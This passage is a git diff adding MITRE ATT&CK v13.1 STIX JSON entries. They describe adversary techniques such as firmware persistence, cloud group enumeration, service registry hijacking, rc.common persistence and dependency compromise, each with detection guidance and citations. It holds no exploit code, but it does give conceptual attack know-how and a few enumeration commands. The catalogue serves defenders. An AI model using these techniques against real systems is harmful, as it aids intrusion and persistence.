to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_contributors": [ + "Jean-Ian Boutin, ESET", + "McAfee", + "Ryan Becwar" + ], + "x_mitre_detection": "System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.\n\nLikewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Firmware: Firmware Modification" + ], + "x_mitre_defense_bypassed": [ + "Host intrusion prevention systems", + "Anti-virus", + "File monitoring" + ], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "id": "attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada", + "created": "2019-12-19T19:43:34.507Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1542/001", + "external_id": "T1542.001" + }, + { + "source_name": "Wikipedia BIOS", + "description": "Wikipedia. (n.d.). BIOS. Retrieved January 5, 2016.", + "url": "https://en.wikipedia.org/wiki/BIOS" + }, + { + "source_name": "Wikipedia UEFI", + "description": "Wikipedia. (2017, July 10). Unified Extensible Firmware Interface. Retrieved July 11, 2017.", + "url": "https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface" + }, + { + "source_name": "About UEFI", + "description": "UEFI Forum. (n.d.). About UEFI Forum. Retrieved January 5, 2016.", + "url": "http://www.uefi.org/about" + }, + { + "source_name": "MITRE Trustworthy Firmware Measurement", + "description": "Upham, K. (2014, March). Going Deep into the BIOS with MITRE Firmware Security Research. Retrieved January 5, 2016.", + "url": "http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research" + }, + { + "source_name": "MITRE Copernicus", + "description": "Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions about BIOS Security. Retrieved December 11, 2015.", + "url": "http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about" + }, + { + "source_name": "McAfee CHIPSEC Blog", + "description": "Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against Vault 7 Disclosure Scanning. Retrieved March 13, 2017.", + "url": "https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/" + }, + { + "source_name": "Github CHIPSEC", + "description": "Intel. (2017, March 18). CHIPSEC Platform Security Assessment Framework. Retrieved March 20, 2017.", + "url": "https://github.com/chipsec/chipsec" + }, + { + "source_name": "Intel HackingTeam UEFI Rootkit", + "description": "Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. Retrieved March 20, 2017.", + "url": "http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26.json new file mode 100644 index 0000000000000000000000000000000000000000..b86d53266c9727a2d37d523b03d3bebdffedf1d4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--ef994783-cf01-4e86-8fc9-7c1f32c4036c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26", + "type": "attack-pattern", + "created": "2020-10-02T16:51:50.306Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1594", + "url": "https://attack.mitre.org/techniques/T1594" + }, + { + "source_name": "Comparitech Leak", + "url": "https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/", + "description": "Bischoff, P. (2020, October 15). Broadvoice database of more than 350 million customer records exposed online. Retrieved October 20, 2020." + } + ], + "modified": "2021-04-15T03:53:33.023Z", + "name": "Search Victim-Owned Websites", + "description": "Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_detection": "Monitor for suspicious network traffic that could be indicative of adversary reconnaissance, such as rapid successions of requests indicative of web crawling and/or large quantities of requests originating from a single source (especially if the source is known to be associated with an adversary). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Application Log: Application Log Content" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--16e94db9-b5b1-4cd0-b851-f38fbd0a70f2.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--16e94db9-b5b1-4cd0-b851-f38fbd0a70f2.json new file mode 100644 index 0000000000000000000000000000000000000000..43a95575377f9135c5c23f20f417398c70bf54a4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--16e94db9-b5b1-4cd0-b851-f38fbd0a70f2.json @@ -0,0 +1,95 @@ +{ + "type": "bundle", + "id": "bundle--da5f17eb-9281-4ea1-8050-85a588c4a28e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-21T13:33:40.625Z", + "name": "Cloud Groups", + "description": "Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.\n\nWith authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).\n\nAzure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation) In AWS, the commands `ListRolePolicies` and `ListAttachedRolePolicies` allow users to enumerate the policies attached to a role.(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)\n\nAdversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_contributors": [ + "Regina Elwell", + "Isif Ibrahima, Mandiant" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Google Workspace" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [ + "Group: Group Enumeration", + "Application Log: Application Log Content", + "Process: Process Creation", + "Command: Command Execution", + "Group: Group Metadata" + ], + "type": "attack-pattern", + "id": "attack-pattern--16e94db9-b5b1-4cd0-b851-f38fbd0a70f2", + "created": "2020-02-21T21:15:33.222Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1069/003", + "external_id": "T1069.003" + }, + { + "source_name": "AWS Get Bucket ACL", + "description": "Amazon Web Services. (n.d.). Retrieved May 28, 2021.", + "url": "https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetBucketAcl.html" + }, + { + "source_name": "Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022", + "description": "Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials: Case Studies From the Wild. Retrieved March 9, 2023.", + "url": "https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/" + }, + { + "source_name": "Black Hills Red Teaming MS AD Azure, 2018", + "description": "Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active Directory Leaks via Azure. Retrieved October 6, 2019.", + "url": "https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/" + }, + { + "source_name": "Google Cloud Identity API Documentation", + "description": "Google. (n.d.). Retrieved March 16, 2021.", + "url": "https://cloud.google.com/identity/docs/reference/rest" + }, + { + "source_name": "Microsoft AZ CLI", + "description": "Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.", + "url": "https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest" + }, + { + "source_name": "Microsoft Msolrole", + "description": "Microsoft. (n.d.). Get-MsolRole. Retrieved October 6, 2019.", + "url": "https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrole?view=azureadps-1.0" + }, + { + "source_name": "GitHub Raindance", + "description": "Stringer, M.. (2018, November 21). RainDance. Retrieved October 6, 2019.", + "url": "https://github.com/True-Demon/raindance" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c.json new file mode 100644 index 0000000000000000000000000000000000000000..22a329450fc4fee255c228d3112e0407d417bdeb --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c.json @@ -0,0 +1,113 @@ +{ + "type": "bundle", + "id": "bundle--0d8e98f4-adef-42d8-bb05-ba36b2280f13", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T21:01:38.651Z", + "name": "Services Registry Permissions Weakness", + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)\n\nIf the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\n\nAdversaries may also alter other Registry keys in the service\u2019s Registry tree. For example, the FailureCommand key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)\n\nThe Performance key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the Performance key is not already present and if an adversary-controlled user has the Create Subkey permission, adversaries may create the Performance key in the service\u2019s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms)\n\nAdversaries may also add the Parameters key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.(Citation: microsoft_services_registry_tree)(Citation: troj_zegost) Additionally, If adversaries launch their malicious services using svchost.exe, the service\u2019s file may be identified using HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\servicename\\Parameters\\ServiceDll.(Citation: malware_hides_service)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Travis Smith, Tripwire", + "Matthew Demaske, Adaptforward" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.\n\nMonitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Service: Service Modification", + "Windows Registry: Windows Registry Key Modification", + "Process: Process Creation" + ], + "x_mitre_defense_bypassed": [ + "Application Control" + ], + "x_mitre_effective_permissions": [ + "SYSTEM" + ], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "type": "attack-pattern", + "id": "attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c", + "created": "2020-03-13T11:42:14.444Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1574/011", + "external_id": "T1574.011" + }, + { + "source_name": "Tweet Registry Perms Weakness", + "description": "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved April 9, 2018.", + "url": "https://twitter.com/r0wdy_/status/936365549553991680" + }, + { + "source_name": "insecure_reg_perms", + "description": "Cl\u00e9ment Labro. (2020, November 12). Windows RpcEptMapper Service Insecure Registry Permissions EoP. Retrieved August 25, 2021.", + "url": "https://itm4n.github.io/windows-registry-rpceptmapper-eop/" + }, + { + "source_name": "Kansa Service related collectors", + "description": "Hull, D.. (2014, May 3). Kansa: Service related collectors and analysis. Retrieved October 10, 2019.", + "url": "https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html" + }, + { + "source_name": "malware_hides_service", + "description": "Lawrence Abrams. (2004, September 10). How Malware hides and is installed as a Service. Retrieved August 30, 2021.", + "url": "https://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-service/" + }, + { + "source_name": "Autoruns for Windows", + "description": "Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. Retrieved March 13, 2020.", + "url": "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns" + }, + { + "source_name": "Registry Key Security", + "description": "Microsoft. (2018, May 31). Registry Key Security and Access Rights. Retrieved March 16, 2017.", + "url": "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN" + }, + { + "source_name": "microsoft_services_registry_tree", + "description": "Microsoft. (2021, August 5). HKLM\\SYSTEM\\CurrentControlSet\\Services Registry Tree. Retrieved August 25, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree" + }, + { + "source_name": "troj_zegost", + "description": "Trend Micro. (2012, October 9). TROJ_ZEGOST. Retrieved September 2, 2021.", + "url": "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--17fd695c-b88c-455a-a3d1-43b6cb728532.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--17fd695c-b88c-455a-a3d1-43b6cb728532.json new file mode 100644 index 0000000000000000000000000000000000000000..5d9e988e94c81e071dc930b0bff06c99fc634bd0 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--17fd695c-b88c-455a-a3d1-43b6cb728532.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--e85f8a47-e230-4321-8f6e-d34453e79b59", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--17fd695c-b88c-455a-a3d1-43b6cb728532", + "type": "attack-pattern", + "created": "2020-10-02T16:57:45.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1596.001", + "url": "https://attack.mitre.org/techniques/T1596/001" + }, + { + "source_name": "DNS Dumpster", + "url": "https://dnsdumpster.com/", + "description": "Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020." + }, + { + "source_name": "Circl Passive DNS", + "url": "https://www.circl.lu/services/passive-dns/", + "description": "CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020." + } + ], + "modified": "2021-04-15T03:49:13.409Z", + "name": "DNS/Passive DNS", + "description": "Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target\u2019s subdomains, mail servers, and other hosts.\n\nAdversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--18d4ab39-12ed-4a16-9fdb-ae311bba4a0f.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--18d4ab39-12ed-4a16-9fdb-ae311bba4a0f.json new file mode 100644 index 0000000000000000000000000000000000000000..63615363b135d1132b5bcea2f07aeb04add35671 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--18d4ab39-12ed-4a16-9fdb-ae311bba4a0f.json @@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--fe647964-c998-4c7c-bc69-f524d1c8b5d5", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--18d4ab39-12ed-4a16-9fdb-ae311bba4a0f", + "type": "attack-pattern", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1163", + "url": "https://attack.mitre.org/techniques/T1163" + }, + { + "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html", + "description": "Apple. (2016, September 13). Startup Items. Retrieved July 11, 2017.", + "source_name": "Startup Items" + }, + { + "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf", + "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", + "source_name": "Methods of Mac Malware Persistence" + } + ], + "modified": "2020-01-15T16:27:32.362Z", + "name": "Rc.common", + "description": "During the boot process, macOS executes source /etc/rc.common, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings, and is thus recommended to include in the start of Startup Item Scripts (Citation: Startup Items). In macOS and OS X, this is now a deprecated technique in favor of launch agents and launch daemons, but is currently still used.\n\nAdversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user (Citation: Methods of Mac Malware Persistence).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_detection": "The /etc/rc.common file can be monitored to detect changes from the company policy. Monitor process execution resulting from the rc.common script for unusual or unknown applications or behavior.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_permissions_required": [ + "root" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720.json new file mode 100644 index 0000000000000000000000000000000000000000..5c138982808294c5f0f9f3a99e68568351076ea9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720.json @@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--e9f4a89c-586c-4f67-832b-3945e0246dde", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720", + "created": "2020-03-11T14:13:42.916Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1195.001", + "url": "https://attack.mitre.org/techniques/T1195/001" + }, + { + "source_name": "Trendmicro NPM Compromise", + "url": "https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets", + "description": "Trendmicro. (2018, November 29). Hacker Infects Node.js Package to Steal from Bitcoin Wallets. Retrieved April 10, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise) \n\nTargeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. ", + "modified": "2022-04-28T16:03:59.172Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Compromise Software Dependencies and Development Tools", + "x_mitre_detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_data_sources": [ + "File: File Metadata" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421.json new file mode 100644 index 0000000000000000000000000000000000000000..ca9815b3a49794862540b0552082c6ec01cc9bb3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421.json @@ -0,0 +1,66 @@ +{ + "type": "bundle", + "id": "bundle--d64e41e1-21ac-49c2-92b2-9795e0acc1a8", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421", + "type": "attack-pattern", + "created": "2020-10-01T02:14:18.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1588.004", + "url": "https://attack.mitre.org/techniques/T1588/004" + }, + { + "description": "Fisher, D. (2012, October 31). Final Report on DigiNotar Hack Shows Total Compromise of CA Servers. Retrieved March 6, 2017.", + "source_name": "DiginotarCompromise", + "url": "https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/" + }, + { + "source_name": "Let's Encrypt FAQ", + "url": "https://letsencrypt.org/docs/faq/", + "description": "Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved October 15, 2020." + }, + { + "source_name": "Splunk Kovar Certificates 2017", + "url": "https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html", + "description": "Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL Certificates. Retrieved October 16, 2020." + }, + { + "source_name": "Recorded Future Beacon Certificates", + "url": "https://www.recordedfuture.com/cobalt-strike-servers/", + "description": "Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying Rogue Cobalt Strike Servers. Retrieved October 16, 2020." + } + ], + "modified": "2021-10-16T17:44:09.486Z", + "name": "Digital Certificates", + "description": "Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.\n\nAdversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting 